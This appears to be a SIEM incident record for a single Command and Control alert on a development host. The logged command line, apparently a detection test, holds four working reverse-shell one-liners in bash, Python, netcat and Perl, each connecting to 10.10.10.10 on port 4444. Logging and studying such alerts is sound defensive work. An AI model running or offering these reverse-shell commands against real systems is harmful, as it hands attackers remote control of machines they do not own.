Medium CINC-20251220-2408719A new
Aggregate ID: aggind:021368f9220b45cdb2760a069897c1c8:18068299277
Incident Overview
Incident ID
CINC-20251220-2408719A
Severity
Medium (70)
Status
new
Alert Count
1
Host Count
1
Timeline
First Seen
2025-12-20 08:39:40
Last Seen
2025-12-20 08:39:40
Duration
0d 0h 0m
Created
2025-12-20 13:23
Updated
2026-01-13 15:14
Kill Chain Analysis
Observed Tactics:
Techniques:
Affected Hosts (1)
Related Alerts (1)
| Severity | Status | Hostname | Description | Tactic | Command Line | Time |
|---|---|---|---|---|---|---|
| High | new | siemdev-14 | Command and Control | bash -c echo "=== Bash Reverse Shell ===" timeout 3 bash -c "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1" 2>/dev/null & sleep 1 echo "=== Python Reverse Shell ===" timeout 3 python3 -c "import socket,subprocess,os;s=socket.socket();s.connect((\"10.10.10.10\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])" 2>/dev/null & sleep 1 echo "=== Netcat Reverse Shell ===" timeout 3 nc -e /bin/sh 10.10.10.10 4444 2>/dev/null & sleep 1 echo "=== Perl Reverse Shell ===" timeout 3 perl -e "use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));connect(S,sockaddr_in(4444,inet_aton(\"10.10.10.10\")));open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");" 2>/dev/null & sleep 1 echo "Done" | 12-20 08:39 |